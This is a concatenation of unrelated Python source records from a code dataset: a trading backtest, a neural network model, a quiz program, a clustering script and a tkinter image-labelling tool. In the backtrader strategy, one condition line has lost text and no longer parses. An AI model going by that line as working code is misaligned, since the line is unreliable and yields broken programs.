GammaIV_arg.subs(substitutions).evalf() #Help the loop by evaluating common variables.\n \n for lnM in theta_samples:\n \n # The simpy expressions are evaluated into a list for each sample of the masses.\n out = GammaIV_arg_temp.subs([('lnM',lnM)]).evalf()\n GammaIV_list.append(float(out))\n \n GammaIV_arg = GammaIV_list/pdet_lambda(theta_samples,NsampsSelFct,var,threshold) #set up argument of integral.\n GammaIV_int = NsampsSelFct**-1*np.sum(GammaIV_arg)# perform the MC integration here.\n \n tIV = time.time()\n print('The fourth term in the FM takes', int(tIV-tIII), 's to evaluate')\n print('Fourth integral:', Ndetections *GammaIV_int)\n print('------------------------------------------------')\n \n ###################################\n # MC integration of the fifth term.\n ###################################\n \n \n GammaV_list=[]\n GammaV_arg_temp = GammaV_arg.subs(substitutions).evalf() #Help the loop by evaluating common variables.\n \n for lnM in theta_samples:\n \n # The simpy expressions are evaluated into a list for each sample of the masses.\n out = GammaV_arg_temp.subs([('lnM',lnM)]).evalf()\n GammaV_list.append(float(out))\n \n GammaV_arg = GammaV_list*pdet_theta(theta_samples,var,threshold)/pdet_lambda(theta_samples,NsampsSelFct,var,threshold) #set up argument of integral.\n GammaV_int = NsampsSelFct**-1*np.sum(GammaV_arg)# perform the MC integration here.\n \n tV = time.time()\n print('The fifth term in the FM takes', int(tV-tIV), 's to evaluate')\n print('Fifth integral:', Ndetections *GammaV_int)\n print('------------------------------------------------')\n \n return Ndetections * (GammaI_int + GammaII_int + GammaIII_int + GammaIV_int + GammaV_int)\n\n","repo_name":"aantonelli94/PopFisher","sub_path":"GW_like_examples/Fisher_PowerLaw.py","file_name":"Fisher_PowerLaw.py","file_ext":"py","file_size_in_byte":9651,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"5"} +{"seq_id":"37449885221","text":"from __future__ import (absolute_import, division, print_function,\n unicode_literals)\nimport pandas as pd\nimport numpy as np\nimport talib as ta\nimport matplotlib.pyplot as plt\nimport csv\nimport backtrader as bt\nimport datetime as dt\nfrom datetime import date,time,timedelta\n\n\nclass FirstStrategy(bt.Strategy):\n params=(\n ('exitbars',12),\n )\n def log(self,txt):\n print(txt)\n def __init__(self):\n self.datetime = self.datas[0].datetime\n self.dataclose = self.datas[0].close\n self.dataopen = self.datas[0].open\n self.datahigh = self.datas[0].high\n self.datalow = self.datas[0].low\n self.ema13=bt.indicators.ExponentialMovingAverage(self.datas[0],period=13)\n self.ema34 = bt.indicators.ExponentialMovingAverage(self.datas[0], period=34)\n self.buy1=-1\n self.sell1=-1\n self.candlebuy=0\n self.candlesell=0\n\n\n '''\n def notify_order(self, order):\n if order.status in [order.Submitted,order.Accepted]:\n return\n if order.status in [order.Completed]:\n if order.isbuy():\n self.log(\"Buy Executed:\"+str(order.executed.price))\n elif order.issell():\n self.log(\"Sell Executed:\"+str(order.executed.price))\n self.bar_executed=len(self)\n elif order.status in [order.Canceled,order.Margin,order.Rejected]:\n self.log('Order cancelled/Margin not sufficient/Rejected')\n\n '''\n def next(self):\n self.combined1 = dt.datetime.combine(self.datetime.date(), dt.time(9, 15))\n self.combined2 = dt.datetime.combine(self.datetime.date(), dt.time(15, 00))\n self.combined3 = dt.datetime.combine(self.datetime.date(), dt.time(15, 10))\n self.log(\"CLOSE:\"+str(self.dataclose[0]))\n self.log(\"OPEN:\"+str(self.dataopen[0]))\n self.log(\"LOW:\"+str(self.datalow[0]))\n self.log(\"HIGH:\"+str(self.datahigh[0]))\n self.log(\"TIME:\"+str(self.datetime.datetime()))\n self.log(\"EMA13:\"+str(self.ema13[0]))\n self.log(\"EMA34:\"+str(self.ema34[0]))\n\n if not self.position:\n if self.datetime.datetime() self.ema13[0] and self.dataclose[0]>self.ema34[0]):\n self.log(str(self.datetime.datetime())+\" BUY TRIGGERED \"+str(self.dataclose[0]))\n self.stoplossbuy=self.datalow[0]\n self.order=self.buy()\n self.log(\"STOPLOSS FOR BUY IS:\"+str(self.stoplossbuy))\n self.buy1=0\n self.candlebuy=0\n if (self.datalow[-1]>self.ema13[0] or self.datalow[-1] >self.ema34[0]) and (self.dataclose[0]=self.params.exitbars or self.dataclose[0]<=self.stoplossbuy or self.dataopen[0]<=self.stoplossbuy or self.datalow[0]<=self.stoplossbuy or self.datetime.datetime==self.combined3:\n self.log(str(self.datetime.datetime())+\"BUY EXIT\"+str(self.dataclose[0]))\n self.close()\n self.log(\"Updated balance:\"+str(cerebro.broker.getvalue()))\n if self.sell1==0:\n self.candlesell+=1\n if self.candlebuy>=self.params.exitbars or self.dataclose[0]>=self.stoplosssell or self.dataopen[0]>=self.stoplosssell or self.datahigh[0]>=self.stoplosssell or self.datetime.datetime==self.combined3:\n self.log(str(self.datetime.datetime())+\"SELL EXIT\"+str(self.dataclose[0]))\n self.close()\n self.log(\"Updated balance:\"+str(cerebro.broker.getvalue()))\n\n\n\n\n\n\n\n def stop(self):\n self.log(\"Finished with the processing\")\n\n\n\nif __name__=='__main__':\n cerebro=bt.Cerebro()\n cerebro.addstrategy(FirstStrategy,exitbars=5)\n datapath=\"D:/Trading/Backtesting_Course/testdata/NIFTY_F1_5min.csv\"\n data=bt.feeds.GenericCSVData(\n dataname=datapath,\n fromdate=dt.datetime(2018, 1, 1),\n todate=dt.datetime(2018, 1, 5),\n datetime=0,\n timeframe=bt.TimeFrame.Minutes,\n compression=1,\n dtformat=('%Y-%m-%d %H:%M:%S'),\n open=1,\n high=2,\n low=3,\n close=4,\n volume=None,\n openinterest=None,\n reverse=False,\n header=0\n )\n cerebro.adddata(data)\n # cerebro.adddata(data2)\n cerebro.addsizer(bt.sizers.FixedSize, stake=75)\n #cerebro.broker.setcommission(commission=0.001)\n cerebro.broker.set_cash(1000000.00)\n print(\"Starting portfolio value:\" + str(cerebro.broker.getvalue()))\n cerebro.run()\n print(\"Final portfolio value:\" + str(cerebro.broker.getvalue()))\n cerebro.plot(volume=False)\n\n\n\n\n\n\n\n","repo_name":"Bismoy943/STA_Assigns_Bismoy","sub_path":"W06D38/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":5263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"73258199193","text":"import os\nimport string\nimport numpy as np\nfrom PIL import Image\n\nimport tensorflow as tf\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout, Activation, Flatten\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D\nfrom tensorflow.keras.models import load_model\n\nclass LISAModel:\n num_channels = 3\n image_size = 32\n num_labels = 8\n\n def __init__(self, restore, session=None):\n\n model = Sequential()\n\n layers = [Conv2D(64, [8, 8],\n strides=(2, 2),\n padding=\"same\",\n input_shape=[self.image_size,\n self.image_size,\n self.num_channels],\n data_format='channels_last'),\n Activation('relu'),\n Conv2D(64 * 2, [6, 6],\n strides=(2, 2),\n padding=\"valid\"),\n Activation('relu'),\n Conv2D(64 * 2, [5, 5],\n strides=(1, 1),\n padding=\"valid\"),\n Activation('relu'),\n Flatten(),\n Dense(self.num_labels)]\n\n for layer in layers:\n model.add(layer)\n\n model.load_weights(restore)\n self.model = model\n\n def predict(self, data, tanhspace=0): # tanhspace doesn't matter here\n return self.model(data)\n\nif __name__ == \"__main__\":\n data = LISA(mode='color', shuffle=False)\n print(data.data.shape, data.labels.shape)\n","repo_name":"Harry1993/GhostImage","sub_path":"setup_lisa.py","file_name":"setup_lisa.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"35665653951","text":"#获取测试用例\nn = int(input())\nfor i in range (n):\n#利用切片将高度和弹跳次数进行统计\n\thigh,count = list(map(int,input().split()))\n\t#保存初始高度\n\trun = high\n\t#进行第一次以后的高度运算\n\tfor j in range(count-1):\n\t\t\thigh = high / 2\n\t\t\trun = run + high * 2\n\tprint(\"%.2f\"%run)\n\t","repo_name":"1354107742/PythonForLearning","sub_path":"runball.py","file_name":"runball.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"41450267798","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.cluster import KMeans\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.model_selection import train_test_split\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport plotly.express as px\n\nlabelEncoder = LabelEncoder()\nscaler = MinMaxScaler()\n\ndata = pd.read_csv('data_w_genres.csv')\ndata.drop(['key', 'mode', 'count'], axis=1, inplace=True)\ncolumns = ['instrumentalness', 'acousticness', 'danceability','energy','liveness','genres']\n\nnewData = data.replace(0, pd.np.nan).dropna(axis=0, how='any')\nnewData = newData[columns]\n\nnewData = newData[newData.genres != \"[]\"]\nnewData.reset_index(drop=True, inplace=True)\nfilterDataArray = []\nrap = 0\nclassical = 0\n\nfor index, row in newData.iterrows():\n if(\"rap\" in row['genres'] and rap <1100):\n newData.at[index, 'genres'] = 'rap'\n filterDataArray.append(newData.iloc[index])\n rap = rap + 1\n elif(\"classical\" in row['genres'] and classical <1100):\n newData.at[index, 'genres'] = 'classical'\n filterDataArray.append(newData.iloc[index])\n classical = classical + 1\n \n \n \nfilterData = pd.DataFrame(filterDataArray, columns = ['instrumentalness', 'acousticness', 'danceability','energy','liveness', 'genres'])\nlabelEncoder = LabelEncoder()\nlabelEncoder.fit(filterData['genres'])\nfilterData['genres'] = labelEncoder.transform(filterData['genres'])\n\n\nx = np.array(filterData.drop(['genres'], 1).astype(float))\nfilterData= filterData.drop(['genres'], 1)\n\nX_scaled = scaler.fit_transform(x)\nkmeans = KMeans(n_clusters=2, max_iter=600).fit(X_scaled)\n\n\nfilterData['kmeans'] = kmeans.labels_\nfilterData.columns = ['instrumentalness', 'acousticness', 'danceability','energy','liveness','kmeans']\n\nfig = px.scatter_3d(filterData, x='instrumentalness', y='acousticness', z='danceability',\n color='kmeans')\nfig.show()\n\nc0 = filterData[filterData['kmeans']==0]\nc1 = filterData[filterData['kmeans']==1]\n\n\nc0.drop(['kmeans'], axis=1, inplace=True)\nc1.drop(['kmeans'], axis=1, inplace=True)\n\nx = c0.values #returns a numpy array\nc0_scaled = scaler.fit_transform(x)\nc0 = pd.DataFrame(c0_scaled)\nc0.columns = ['instrumentalness', 'acousticness', 'danceability','energy','liveness' ]\nc0=c0.melt(var_name='groups', value_name='rap')\n\nx = c1.values #returns a numpy array\nc1_scaled = scaler.fit_transform(x)\nc1 = pd.DataFrame(c1_scaled)\nc1.columns = ['instrumentalness', 'acousticness', 'danceability','energy','liveness']\nc1=c1.melt(var_name='groups', value_name='classical')\n\n\nf, axes = plt.subplots(2, 1)\nax = sns.violinplot( data=c0 ,x=\"groups\", y=\"rap\", linewidth = 0.6, inner = 'point', scale= 'width', ax=axes[0])\nax = sns.violinplot( data=c1 ,x=\"groups\", y=\"classical\", linewidth = 0.6, inner = 'point', scale= 'width', ax=axes[1])\n\nplt.show()","repo_name":"Cogitus/ia-project-2020.2","sub_path":"Kmeans/kmeans_gender_final.py","file_name":"kmeans_gender_final.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"14032012392","text":"import sqlite3\r\nimport random\r\nimport Question\r\n\r\ncon = sqlite3.connect('rm1.db')\r\ncur = con.cursor()\r\ninp_section = input(\"K1, K2, K3 ili I?\")\r\n\r\ncur.execute(\"select MAX(idq) from questions\")\r\n\r\nquestionNr = int(cur.fetchall()[0][0])\r\n\r\nwhile True:\r\n\r\n rand_nr = random.randint(1, questionNr)\r\n if inp_section[0] == 'I':\r\n cur.execute(\"select * from questions where questions.idq = ?\", (rand_nr,))\r\n else:\r\n cur.execute(\"select * from questions where questions.idq = ? and section = ? \", (rand_nr, inp_section[1]))\r\n fetched = cur.fetchone()\r\n if fetched is None:\r\n continue\r\n qText = fetched[1].strip()\r\n if fetched[2] == \"MulChoice\":\r\n question = Question.MultipleSolutionQuestion(qText, fetched[3])\r\n elif fetched[2] == \"SingleChoice\":\r\n question = Question.SingleSolutionQuestion(qText, fetched[3])\r\n elif fetched[2] == \"Essay\":\r\n question = Question.EssayQuestion(qText, fetched[3])\r\n elif fetched[2] == \"True/False\":\r\n question = Question.TrueFalseQuestion(qText, fetched[3])\r\n\r\n cur.execute(\"select * from statements where statements.idq = ?\", (rand_nr,))\r\n output = cur.fetchall()\r\n if fetched[2] == \"True/False\":\r\n question.add_statement(\"True\")\r\n # No soutions for these for now\r\n else:\r\n for x in output:\r\n question.add_statement(x[1], float(x[2]))\r\n print(question)\r\n\r\n inp = input()\r\n inp = inp.strip()\r\n\r\n try:\r\n\r\n if fetched[2] == \"MulChoice\":\r\n answs = inp.split()\r\n for answ in answs:\r\n question.mark_statement(int(answ))\r\n print(question.check_answer())\r\n elif fetched[2] == \"SingleChoice\":\r\n question.mark_statement(int(inp))\r\n print(question.check_answer())\r\n elif fetched[2] == \"Essay\":\r\n question.add_answer(inp)\r\n print(question.check_answer())\r\n elif fetched[2] == \"True/False\":\r\n question.add_answer(inp)\r\n print(question.check_answer())\r\n\r\n except:\r\n pass\r\n question.print_answer()\r\n","repo_name":"veljkoselakovic/RM1-pitanja","sub_path":"mainProgram.py","file_name":"mainProgram.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"12206497597","text":"#importation\nimport tkinter as tk\nimport tkinter.ttk as ttk\nfrom tkinter import filedialog as fd\nfrom tkinter import messagebox as mb\nfrom PIL import Image, ImageTk\nimport SimpleITK as sitk\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport threading\n\nlock = threading.RLock()\n\nclass progress_popup(tk.Toplevel):\n \n def __init__(self, master, text=''):\n self._flag = True\n tk.Toplevel.__init__(self, master=master)\n self.geometry('%dx%d+%d+%d' % (master.winfo_screenwidth() // 4, \n master.winfo_screenwidth() // 16, \n master.winfo_rootx() + master.winfo_width() // 2 - master.winfo_screenwidth() // 8, \n master.winfo_rooty() + master.winfo_height() // 2 - master.winfo_screenwidth() // 32\n )\n )\n self.attributes('-topmost', True)\n self.resizable(width=False, height=False)\n label = tk.Label(self, text=text)\n self._probar = ttk.Progressbar(self, \n length = master.winfo_screenwidth(), \n mode='determinate', \n orient='horizontal'\n )\n self._probar['value'] = 0\n label.pack(padx=20, pady=20)\n self._probar.pack(padx=20, pady=20)\n self.grab_set()\n\n def maximum(self, max):\n self._probar['maximum'] = max\n\n def step(self):\n self._probar.step()\n self._probar.update()\n \n def destroy(self):\n lock.acquire()\n self._flag = False\n lock.release()\n super().destroy()\n\nclass type_dialog(tk.Toplevel):\n\n def __init__(self, master=None, title='', types=('NULL',)):\n tk.Toplevel.__init__(self, master=master)\n self.attributes('-topmost', True)\n self.resizable(width=False, height=False)\n self._label = tk.Label(self, text='Please choose a(n) '+title+' type: ')\n self._typelist = ttk.Combobox(self, \n width=self.winfo_width(), \n state='readonly', \n )\n self._typelist['value'] = types\n self._typelist.current(0)\n self._btn = tk.Button(self,\n text='OK', \n command=self._ok, \n )\n self._label.pack(fill='both', padx=20, pady=10)\n self._typelist.pack(fill='both', padx=20)\n self._btn.pack(fill='both', padx=20, pady=10)\n self.geometry('%dx%d+%d+%d' % (master.winfo_screenwidth() // 8, \n master.winfo_screenwidth() // 16, \n master.winfo_rootx() + master.winfo_width() // 2 - master.winfo_screenwidth() // 16, \n master.winfo_rooty() + master.winfo_height() // 2 - master.winfo_screenwidth() // 32\n )\n )\n self.grab_set()\n self._type = None\n \n def _ok(self):\n self._type = self._typelist.get()\n self.destroy()\n\nclass BLW(tk.Tk):\n #class members\n _axis_color = {'X':'#f00', 'Y':'#0f0', 'Z':'#00f'}\n _plane_to_no = {'XY':0, 'YZ':1, 'XZ':2}\n _no_to_plane = 'XY', 'YZ', 'XZ'\n\n def __init__(self):\n tk.Tk.__init__(self)\n #object vars\n self._btn_value = 'XY'\n self._radio_var = tk.StringVar()\n self._surf_on = tk.BooleanVar()\n self._axes_on = tk.BooleanVar()\n self._combolist_text = tk.StringVar()\n self._cache = {}\n self._pic_handle = None\n self._path_v3d = ''\n self._dir = None\n self._btn = {}\n self._radio = {}\n self._menu = {}\n self._rawtype = None\n self._masktype = None\n frame = {}\n # mainwindow\n self.title('Batch Label Widget')\n style = ttk.Style(self)\n scrw, scrh = self.winfo_screenwidth(), self.winfo_screenheight()\n style.configure('XYZ.TButton', \n font=('Helvetica', scrh//32, 'bold')\n )\n style.configure('LF.TButton', \n font=('Helvetica', scrh//16, 'bold')\n )\n self.geometry('%dx%d+%d+%d' % (scrw//2, scrh//2, scrw//4, scrh//4))\n self.minsize(scrw//2, scrh//2)\n # menubar\n menubar = tk.Menu(self)\n self._menu['file'] = tk.Menu(menubar, tearoff=False)\n self._menu['tool'] = tk.Menu(menubar, tearoff=False)\n self._menu['help'] = tk.Menu(menubar, tearoff=False)\n menubar.add_cascade(label='File', menu=self._menu['file'])\n menubar.add_cascade(label='Tool', menu=self._menu['tool'])\n menubar.add_cascade(label='Help', menu=self._menu['help'])\n self._menu['file'].add_command(label='Open a dir..', \n command=self._open_dir, \n accelerator='Ctrl+O'\n )\n self._menu['file'].add_command(label='Save labels as..', \n command=self._save_as, \n state='disabled', \n accelerator='Ctrl+S'\n )\n self._menu['file'].add_separator()\n self._menu['file'].add_command(label='Exit', command=self.destroy)\n self._menu['tool'].add_command(label='Set Vaa3D path..', command=self._set_v3d_path)\n self._menu['tool'].add_command(label='Display on Vaa3D', \n command=self._display_on_v3d, \n accelerator='Ctrl+V'\n )\n self._menu['help'].add_command(label='About', command=BLW._about)\n self.config(menu=menubar)\n # upper\n frame['up'] = tk.LabelFrame(self, \n text='Plane Panel', \n height=scrh // 10\n )\n frame['up'].pack(fill='x', \n expand='no', \n padx=10, \n pady=10\n )\n frame['up'].pack_propagate(0)\n self._btn['XY'] = ttk.Button(frame['up'], \n text='XY', \n command=lambda : self._turn_plane(plane='XY'), \n style='XYZ.TButton', \n state='disabled'\n )\n self._btn['YZ'] = ttk.Button(frame['up'], \n text='YZ', \n command=lambda : self._turn_plane(plane='YZ'), \n style='XYZ.TButton', \n state='disabled'\n )\n self._btn['XZ'] = ttk.Button(frame['up'], \n text='XZ', \n command=lambda : self._turn_plane(plane='XZ'), \n style='XYZ.TButton', \n state='disabled'\n )\n self._btn['XY'].pack(side='left', \n expand='yes', \n fill='both', \n padx=10, \n pady=10\n )\n self._btn['XZ'].pack(side='right', \n expand='yes', \n fill='both', \n padx=10, \n pady=10\n )\n self._btn['YZ'].pack(side='left', \n expand='yes', \n fill='both', \n pady=10\n )\n # middle\n frame['mid'] = tk.Frame(self)\n frame['mid'].pack(fill='both', \n expand='yes', \n padx=10, \n pady=10\n )\n frame['mid'].pack_propagate(0)\n frame['left'] = tk.Frame(frame['mid'], width=scrw//20)\n frame['right'] = tk.Frame(frame['mid'], width=scrw//20)\n frame['canvas'] = tk.LabelFrame(frame['mid'], width=scrw*2//3)\n frame['left'].pack(side='left', \n expand='yes', \n anchor='e', \n fill='y'\n )\n frame['right'].pack(side='right', \n expand='yes', \n anchor='w', \n fill='y'\n )\n frame['canvas'].pack(side='left', \n expand='yes', \n fill='both'\n )\n frame['left'].pack_propagate(0)\n frame['right'].pack_propagate(0)\n frame['canvas'].pack_propagate(0)\n self._btn['left'] = ttk.Button(frame['left'], \n text='<', \n command=lambda : self._switch(-1), \n style='LF.TButton', \n state='disabled'\n )\n self._btn['right'] = ttk.Button(frame['right'], \n text='>', \n command=lambda : self._switch(1), \n style='LF.TButton', \n state='disabled'\n )\n self._btn['left'].pack(expand='yes', fill='both')\n self._btn['right'].pack(expand='yes', fill='both')\n self._view = tk.Canvas(frame['canvas'])\n self._view.pack(expand='yes', fill='both')\n # downer\n frame['down'] = tk.LabelFrame(self, \n text='Control Panel', \n height = scrh // 16\n )\n frame['down'].pack(side='bottom', \n fill='x', \n expand='no', \n anchor='s', \n padx=10, \n pady=10\n )\n frame['down'].pack_propagate(0)\n combolabel = tk.Label(frame['down'], \n text='Samples: ', \n font=('Arial', scrh//80)\n )\n combolabel.pack(side='left', padx=10)\n self._combolist = ttk.Combobox(frame['down'], \n width=scrw, \n state='readonly', \n textvariable=self._combolist_text\n )\n self._btn['open'] = tk.Button(frame['down'], \n text='Open', \n command=self._open_dir\n )\n self._btn['save'] = tk.Button(frame['down'], \n text='Save', \n command=self._save_as, \n state='disabled'\n )\n self._btn['save'].pack(side='right', \n padx=10, \n fill='y', \n pady=10\n )\n self._radio['y'] = tk.Radiobutton(frame['down'], \n text='YES', \n state='disabled', \n font=('Arial', scrh//80), \n command=self._judge, \n value='y', \n variable=self._radio_var\n )\n self._radio['n'] = tk.Radiobutton(frame['down'], \n text='NO', \n state='disabled', \n font=('Arial', scrh//80), \n command=self._judge, \n value='n', \n variable=self._radio_var\n )\n self._radio['na'] = tk.Radiobutton(frame['down'], \n text='N/A', \n state='disabled', \n font=('Arial', scrh//80), \n command=self._judge, \n value='na', \n variable=self._radio_var\n )\n # frame_check = tk.Frame(frame['down'])\n self._check_surf = tk.Checkbutton(frame['down'], \n text='Surface', \n state='disabled', \n font=('Arial', scrh//80), \n variable=self._surf_on\n )\n self._check_axes = tk.Checkbutton(frame['down'], \n text='Axes', \n state='disabled', \n font=('Arial', scrh//80), \n variable=self._axes_on\n )\n self._radio['na'].pack(side='right', \n expand='yes', \n padx=10, \n pady=10\n )\n self._radio['n'].pack(side='right', \n expand='yes', \n padx=10, \n pady=10\n )\n self._radio['y'].pack(side='right', \n expand='yes', \n padx=10, \n pady=10\n )\n # frame_check.pack(side='right', expand='yes')\n self._check_surf.pack(side='right', \n expand='yes', \n padx=10, \n pady=10\n )\n self._check_axes.pack(side='right', \n expand='yes', \n padx=10, \n pady=10\n )\n self._btn['open'].pack(side='right', \n padx=10, \n fill='y', \n pady=10\n )\n self._combolist.pack(side='left', \n fill='y', \n pady=10\n )\n # tracing and binding\n self._combolist_text.trace_add(mode='write', callback=self._repaint)\n self._combolist_text.trace_add(mode='write', callback=self._radio_update)\n self._combolist_text.trace_add(mode='write', callback=self._check_update)\n self._combolist_text.trace_add(mode='write', callback=self._lf_btn_update)\n self._radio_var.trace_add(mode='write', callback=self._repaint_label)\n self._surf_on.trace_add(mode='write', callback=self._repaint)\n self._axes_on.trace_add(mode='write', callback=self._repaint)\n self._view.bind('', self._repaint)\n self.bind('', self._scroll)\n self.bind('', self._scroll)\n self.bind('', self._scroll)\n self.bind('', self._key_open)\n self.bind('', self._key_open)\n self.bind('', self._key_save)\n self.bind('', self._key_save)\n self.bind('', self._key_v3d)\n self.bind('', self._key_v3d)\n self.bind('', self._key_switch)\n self.bind('', self._key_switch)\n self.bind('w', self._key_switch)\n self.bind('s', self._key_switch)\n self.bind('', self._key_turn_plane)\n self.bind('', self._key_turn_plane)\n self.bind('a', self._key_turn_plane)\n self.bind('d', self._key_turn_plane)\n self.bind('1', self._key_label)\n self.bind('2', self._key_label)\n self.bind('3', self._key_label)\n self.bind('j', self._key_label)\n self.bind('k', self._key_label)\n self.bind('l', self._key_label)\n self.bind('J', self._key_label)\n self.bind('K', self._key_label)\n self.bind('L', self._key_label)\n self.bind('q', self._key_axes)\n self.bind('Q', self._key_axes)\n self.bind('e', self._key_surf)\n self.bind('E', self._key_surf)\n\n @classmethod\n def _about(cls):\n mb.showinfo(title='About Batch Label Widget', message='Developed by ZZH for tip quality control')\n \n @classmethod\n def _extract_mask(cls, mask, masktype):\n if not os.path.exists(mask + masktype):\n return None\n n_skip = 0\n with open(mask + masktype, \"r\") as f:\n for line in f.readlines():\n line = line.strip()\n if line.startswith(\"#\"):\n n_skip += 1\n else:\n break\n names = [\"##n\", \"X\", \"Y\", \"Z\", \"parent\"]\n return pd.read_csv(mask + masktype, index_col=0, skiprows=n_skip, sep=\" \", usecols=[0, 2, 3, 4, 6], names=names)\n\n @classmethod\n def _extract_raw(cls, raw, rawtype):\n img = sitk.ReadImage(raw + rawtype)\n if rawtype == '.tif':\n img = sitk.Flip(img, (False, True, False))\n array = sitk.GetArrayFromImage(img)\n # if len(array.shape) == 3:\n return np.max(array, axis=0), np.max(array, axis=2), np.max(array, axis=1)\n # else:\n # return array, np.zeros(array.shape), np.zeros(array.shape)\n\n def _ask_filetype(self, title, types):\n pop = type_dialog(self, title, types)\n self.wait_window(pop)\n return pop._type\n \n def _check_update(self, *arg):\n self._surf_on.set(True)\n self._axes_on.set(True)\n\n def _display_on_v3d(self):\n if self._combolist_text.get() == '':\n return\n filename = os.path.join(self._dir, self._combolist_text.get())\n with open(filename + '.ano', 'w') as ano:\n ano.write('SWCFILE=' + filename + self._masktype + '\\nRAWIMG=' + filename + self._rawtype)\n ano.close()\n try:\n if self._path_v3d == '':\n raise\n os.system(self._path_v3d + ' \"' + ano.name + '\"')\n except:\n try:\n os.system('vaa3d \"' + ano.name + '\"')\n except:\n try:\n os.system('vaa3d_msvc \"' + ano.name + '\"')\n except:\n mb.showerror(title='Vaa3D Not Found', message=\"Vaa3D executable isn't found in either the environment or the path specified.\\n\"\n \"Please specify a proper path or add an environment path directing to an executable with a proper name.\"\n )\n os.remove(ano.name)\n\n def _judge(self):\n self._cache[self._combolist_text.get()]['label'] = self._radio_var.get()\n\n def _key_axes(self, event):\n if event.state & 5 > 0 or \\\n len(self._cache) == 0:\n return\n self._axes_on.set(not self._axes_on.get())\n\n def _key_label(self, event):\n if event.state & 5 > 0 or \\\n len(self._cache) == 0:\n return\n if event.keysym in ('1', 'j', 'J'):\n self._radio_var.set('y')\n elif event.keysym in ('2', 'k', 'K'):\n self._radio_var.set('n')\n else:\n self._radio_var.set('na')\n self._judge()\n\n def _key_open(self, event):\n if event.state & 1 == 0:\n self._open_dir()\n\n def _key_save(self, event):\n if event.state & 1 == 0 or \\\n len(self._cache) == 0:\n self._save_as()\n\n def _key_surf(self, event):\n if event.state & 5 > 0 or \\\n len(self._cache) == 0:\n return\n self._surf_on.set(not self._surf_on.get())\n\n def _key_v3d(self, event):\n if event.state & 1 == 0 or \\\n len(self._cache) == 0:\n self._display_on_v3d()\n \n def _key_switch(self, event):\n if event.state & 5 > 0 or \\\n len(self._cache) == 0 or \\\n event.widget is self._combolist or \\\n type(event.widget) == str and 'combobox' in event.wdiget:\n return\n if event.keysym in ('Up', 'w', 'W'):\n self._switch(-1)\n else:\n self._switch(1)\n\n def _key_turn_plane(self, event):\n if event.state & 5 > 0 or \\\n len(self._cache) == 0:\n return\n if event.keysym in ('Right', 'd', 'D'):\n if self._btn_value != 'XZ':\n self._turn_plane(self._no_to_plane[min(self._plane_to_no[self._btn_value] + 1, 2)]\n )\n else:\n if self._btn_value != 'XY':\n self._turn_plane(self._no_to_plane[max(self._plane_to_no[self._btn_value] - 1, 0)]\n )\n\n def _lf_btn_update(self, *arg):\n if self._combolist.current() == 0:\n self._btn['left'].state(['disabled'])\n else:\n self._btn['left'].state(['!disabled'])\n if self._combolist.current() == len(self._cache) - 1:\n self._btn['right'].state(['disabled'])\n else:\n self._btn['right'].state(['!disabled'])\n\n def _load_files(self, dir, rawtype, masktype):\n pop = progress_popup(self, 'Loading from ' + dir + '..')\n lock.acquire()\n if not pop._flag:\n return None\n cache = {i.replace(rawtype,''): dict.fromkeys(('XY','YZ','XZ','mask','label')) \n for i in os.listdir(dir) if i.endswith(rawtype)\n }\n pop.maximum(len(cache) + 1)\n lock.release()\n for i, j in cache.items():\n lock.acquire()\n if not pop._flag:\n return None\n j['XY'], j['YZ'], j['XZ'] = BLW._extract_raw(os.path.join(dir, i), rawtype)\n j['mask'] = BLW._extract_mask(os.path.join(dir, i), masktype)\n j['label'] = ''\n pop.step()\n lock.release()\n lock.acquire()\n if not pop._flag:\n return None\n pop.destroy()\n lock.release()\n return cache\n\n def _open_dir(self):\n temp = fd.askdirectory(title='Open a Directory..', mustexist=True)\n if type(temp) != str or temp == '' or len(self._cache) != 0 and \\\n not mb.askokcancel(title='Continue?', message='Current cache will be overwritten.'):\n return\n rawtype = self._ask_filetype('raw image type', ('.tif', '.nrrd'))\n if rawtype is None:\n return\n masktype = self._ask_filetype('mask type', ('.eswc', '.swc'))\n if rawtype is None:\n return\n cache = self._load_files(temp, rawtype, masktype)\n if cache is None:\n return\n self._combolist['values'] = tuple(cache.keys())\n self._combolist.set('')\n self._dir = temp\n self._cache = cache\n if len(cache) > 0:\n self._rawtype = rawtype\n self._masktype = masktype\n self._refresh_controls('normal')\n self._combolist.current(0)\n self._lf_btn_update()\n else:\n self._refresh_controls('disabled')\n self._pic_handle = None\n\n def _radio_update(self, *arg):\n if self._combolist_text.get() != '':\n self._radio_var.set(self._cache[self._combolist_text.get()]['label'])\n\n def _refresh_controls(self, flag):\n self._btn['XY']['state'] = flag\n self._btn['YZ']['state'] = flag\n self._btn['XZ']['state'] = flag\n self._btn['left']['state'] = flag\n self._btn['right']['state'] = flag\n self._btn['save']['state'] = flag\n self._radio['n']['state'] = flag\n self._radio['na']['state'] = flag\n self._radio['y']['state'] = flag\n self._check_surf['state'] = flag\n self._check_axes['state'] = flag\n self._menu['file'].entryconfig(1, state=flag)\n self._menu['tool'].entryconfig(1, state=flag)\n self._btn[self._btn_value].state(['pressed', 'disabled'])\n\n def _repaint(self, *arg):\n self._view.delete('all')\n if self._combolist_text.get() == '':\n return\n raw = self._cache[self._combolist_text.get()]\n temp = Image.fromarray(raw[self._btn_value])\n view_w, view_h = self._view.winfo_width(), self._view.winfo_height()\n bias_center = view_w // 2, \\\n view_h // 2\n ratio = min(view_w / temp.height, \n view_h / temp.width\n )\n 